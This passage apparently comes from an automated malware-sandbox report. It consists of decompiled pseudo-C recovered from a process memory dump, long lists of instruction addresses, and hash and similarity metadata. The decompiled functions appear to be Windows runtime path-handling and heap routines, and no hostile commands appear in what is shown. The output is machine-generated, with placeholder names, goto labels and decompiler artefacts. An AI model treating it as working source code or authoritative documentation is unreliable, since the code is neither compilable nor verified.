														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0469F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0469F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0469FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0469FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0469F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0469F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04724CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E046AD130(_t427, _t494, _t511);
				}
			}

0x04725ba5
0x04725baa
0x04725baf
0x04725bb4
0x04725bb6
0x04725bbc
0x04725bbe
0x04725bc4
0x04725bcd
0x04725bd3
0x04725bd6
0x04725bdc
0x04725be0
0x04725be3
0x04725beb
0x04725bf2
0x04725bf8
0x04725bfe
0x04725c04
0x04725c0e
0x04725c18
0x04725c1f
0x04725c25
0x04725c2a
0x04725c2c
0x04725c32
0x04725c3a
0x04725c3f
0x04725c42
0x04725c48
0x04725c5b
0x04725c5b
0x04725c2c
0x04725cb7
0x04725cb9
0x04725cbf
0x04725cc2
0x04725cca
0x04725ccb
0x04725ccb
0x04725cd1
0x04725cd7
0x04725cda
0x04725ce1
0x04725ce4
0x04725ce7
0x04725ced
0x04725cf3
0x04725cf9
0x04725cff
0x04725d08
0x04725d0a
0x04725d0e
0x04725d10
0x00000000
0x00000000
0x04725d16
0x04725d1a
0x00000000
0x00000000
0x04725d20
0x04725d22
0x04725d25
0x04725d2f
0x04725d2f
0x04725d33
0x04725d3d
0x04725d49
0x04725d4b
0x00000000
0x00000000
0x04725d5a
0x04725d5d
0x04725d60
0x00000000
0x00000000
0x04725d66
0x04725d69
0x00000000
0x00000000
0x04725d6f
0x04725d6f
0x04725d73
0x04725d79
0x04725d7f
0x04725d86
0x04725d95
0x04725d98
0x04725dba
0x04725dcb
0x04725dce
0x04725dd3
0x04725dd6
0x04725dd8
0x04725de6
0x04725dec
0x04725dee
0x04725df1
0x04725df3
0x0472635a
0x0472635a
0x00000000
0x0472635a
0x04725dfe
0x04725e02
0x04725e05
0x04725e07
0x04725e10
0x04725e13
0x04725e1b
0x04725e1c
0x04725e21
0x04725e22
0x04725e23
0x04725e25
0x04725e2a
0x04725e2c
0x04725e2e
0x04725e36
0x04725e39
0x04725e42
0x04725e47
0x04725e4d
0x04725e54
0x04725e54
0x04725e54
0x04725e2e
0x04725e5c
0x04725e5f
0x04725e62
0x04725e64
0x04725e6b
0x04725e70
0x04725e7a
0x04725e7a
0x04725e7a
0x04725e6b
0x04725e7e
0x04725e7f
0x04725e7f
0x04725e81
0x04725e87
0x04725e8b
0x04725e8c
0x04725e8c
0x04725e8c
0x04725e9a
0x04725e9c
0x04725ea2
0x04725ea6
0x04725f50
0x04725f50
0x04725f57
0x04725f66
0x04725f66
0x04725f66
0x04725f68
0x04725f6a
0x047263d0
0x00000000
0x04725f70
0x04725f70
0x04725f91
0x04725f9c
0x04725f9e
0x04725fa4
0x04725fa6
0x0472638c
0x04726392
0x047263a1
0x047263a7
0x047263af
0x047263af
0x047263bd
0x047263d8
0x00000000
0x047263d8
0x04725fac
0x04725fb2
0x04725fb4
0x04725fbd
0x04725fc6
0x04725fce
0x04725fd4
0x04725fdc
0x04725fec
0x04725fed
0x04725fee
0x04725fef
0x04725ff9
0x04725ffa
0x04725ffb
0x04725ffc
0x04726000
0x04726004
0x04726012
0x04726012
0x04726018
0x04726019
0x0472601a
0x0472601b
0x0472601c
0x04726020
0x04726059
0x0472605c
0x04726061
0x04726061
0x04726022
0x04726022
0x04726022
0x04726025
0x0472602a
0x0472602b
0x04726031
0x04726037
0x04726038
0x0472603e
0x04726048
0x04726049
0x0472604a
0x0472604b
0x0472604c
0x0472604d
0x04726053
0x04726054
0x04726054
0x04726062
0x04726065
0x04726067
0x0472606a
0x04726070
0x04726075
0x04726076
0x04726081
0x04726087
0x04726095
0x04726099
0x0472609e
0x047260a4
0x047260ae
0x047260b0
0x047260b3
0x047260b6
0x047260b8
0x047260ba
0x047260ba
0x047260ba
0x047260ba
0x047260be
0x047260c0
0x047260c5
0x047260c5
0x047260c5
0x047260c6
0x047260cd
0x04726114
0x047260cf
0x047260cf
0x047260d4
0x047260d5
0x047260da
0x047260db
0x047260e1
0x047260e2
0x047260e8
0x047260f8
0x047260fd
0x047260fe
0x04726102
0x04726104
0x04726107
0x04726109
0x0472610b
0x0472610b
0x0472610b
0x0472610b
0x0472610f
0x0472610f
0x04726117
0x0472611a
0x0472611f
0x04726125
0x04726134
0x04726139
0x0472613f
0x04726146
0x04726148
0x0472614b
0x0472614d
0x0472614f
0x0472614f
0x0472614f
0x0472614f
0x04726153
0x04726159
0x04726159
0x0472615c
0x04726163
0x04726169
0x0472616c
0x04726172
0x04726181
0x04726186
0x04726187
0x0472618b
0x04726191
0x04726195
0x047261a3
0x047261bb
0x047261c0
0x047261c3
0x047261cc
0x047261d0
0x047261dc
0x047261de
0x047261e1
0x047261e4
0x047261e6
0x047261e8
0x047261e8
0x047261e8
0x047261e8
0x047261e6
0x047261ec
0x047261f3
0x04726203
0x04726209
0x0472620a
0x04726216
0x0472621d
0x04726227
0x04726241
0x04726246
0x0472624c
0x04726257
0x04726259
0x0472625c
0x0472625e
0x04726260
0x04726260
0x04726260
0x04726260
0x0472625e
0x04726264
0x04726267
0x04726269
0x04726315
0x04726315
0x0472631b
0x0472631e
0x04726324
0x04726327
0x0472632f
0x04726330
0x04726333
0x0472633a
0x0472633c
0x04726335
0x04726335
0x04726335
0x0472633f
0x04726342
0x0472634c
0x04726352
0x04726355
0x04726355
0x04726359
0x00000000
0x0472626f
0x04726275
0x04726275
0x04726278
0x0472627e
0x0472627e
0x04726281
0x04726287
0x0472628d
0x04726298
0x0472629c
0x047262a2
0x0472629e
0x0472629e
0x0472629e
0x047262a7
0x047262a7
0x047262aa
0x047262b0
0x047262f0
0x047262f0
0x047262f2
0x047262f8
0x047262fd
0x047262b2
0x047262b2
0x047262b2
0x047262b5
0x047262dd
0x047262e2
0x047262e5
0x047262b7
0x047262b8
0x047262bb
0x047262bd
0x047262c0
0x047262c4
0x047262cd
0x047262cd
0x047262c0
0x047262bb
0x047262b5
0x04726302
0x04726303
0x04726305
0x04726305
0x04726305
0x0472630c
0x0472630c
0x00000000
0x0472627e
0x04726269
0x04725eac
0x04725ebb
0x04725ebe
0x04725ecb
0x04725ecb
0x04725ece
0x04725ece
0x04725ed4
0x04725ed7
0x04725ed9
0x04725edb
0x04725edb
0x04725ee1
0x04725ee1
0x04725ee3
0x04725f20
0x04725f20
0x04725ee5
0x04725ee5
0x04725ee5
0x04725ee8
0x04725f11
0x04725f18
0x04725eea
0x04725eea
0x04725eed
0x04725ef2
0x04725ef8
0x04725efb
0x04725f0a
0x04725f0a
0x04725eed
0x04725ee8
0x04725f22
0x04725f28
0x00000000
0x00000000
0x04725f30
0x04725f31
0x04725f37
0x04725f3a
0x04725f3d
0x04725f44
0x00000000
0x00000000
0x00000000
0x04725f46
0x04725f48
0x04725f4d
0x00000000
0x04725f4d
0x04725dda
0x04725ddf
0x00000000
0x04725ddf
0x04725dd8
0x04725da7
0x04725da9
0x04725dac
0x04725dae
0x00000000
0x04725db4
0x04725db4
0x00000000
0x04725db4
0x04725dae
0x04725d88
0x04725d8d
0x04726363
0x04726369
0x0472636a
0x04726370
0x04726372
0x0472637a
0x0472637b
0x0472637d
0x00000000
0x00000000
0x0472637f
0x04726385
0x00000000
0x04726385
0x04725d38
0x04725d3b
0x00000000
0x00000000
0x00000000
0x04725d3b
0x04725d27
0x04725d29
0x00000000
0x00000000
0x00000000
0x04726360
0x00000000
0x04726360
0x04725c10
0x04725c10
0x047263da
0x047263e5
0x047263e5

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0ac66d0dcddd9ce40b9cb3202944dfc5825bd63926cec18b47bbc8a544e3bc7
Instruction ID: 3faef82c1ffc3ecefc5c2a2f6495d731a64a2dac77ac71f2d67bd48039d1912e
Opcode Fuzzy Hash: c0ac66d0dcddd9ce40b9cb3202944dfc5825bd63926cec18b47bbc8a544e3bc7
Instruction Fuzzy Hash: 2C425B75A00229DFDB24CF68C980BAAB7B1FF45304F1581AAD94DEB342E774A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04674120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04674120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x474d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0468F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04676E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04674620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04676E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M046745F8))) {
												case 0:
													_v568 = 0x4631078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x46311c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04674620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0469F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0469F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E046552A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0466EB70(1, 0x47479a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0466AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E046995D0();
																			L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0469B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04693D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0469B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x04674128
0x04674135
0x0467413c
0x04674141
0x04674145
0x04674147
0x0467414e
0x04674151
0x04674159
0x0467415c
0x04674160
0x04674164
0x04674168
0x0467416c
0x0467417f
0x04674181
0x0467446a
0x0467446a
0x0467418c
0x04674195
0x04674199
0x04674432
0x04674439
0x0467443d
0x04674442
0x04674447
0x00000000
0x0467419f
0x046741a3
0x046741b1
0x046741b9
0x046741bd
0x046745db
0x046745db
0x00000000
0x046741c3
0x046741c3
0x046741ce
0x046741d4
0x046be138
0x046be13e
0x046be169
0x046be16d
0x046be19e
0x046be16f
0x046be16f
0x046be175
0x046be179
0x046be18f
0x046be193
0x00000000
0x046be199
0x00000000
0x046be199
0x046be193
0x00000000
0x00000000
0x00000000
0x046741da
0x046741da
0x046741df
0x046741e4
0x046741ec
0x04674203
0x04674207
0x046be1fd
0x04674222
0x04674226
0x046be1f3
0x046be1f3
0x0467422c
0x0467422c
0x04674233
0x046be1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04674239
0x04674239
0x04674239
0x04674239
0x04674233
0x04674226
0x046741ee
0x046741ee
0x046741f4
0x04674575
0x046be1b1
0x046be1b1
0x00000000
0x0467457b
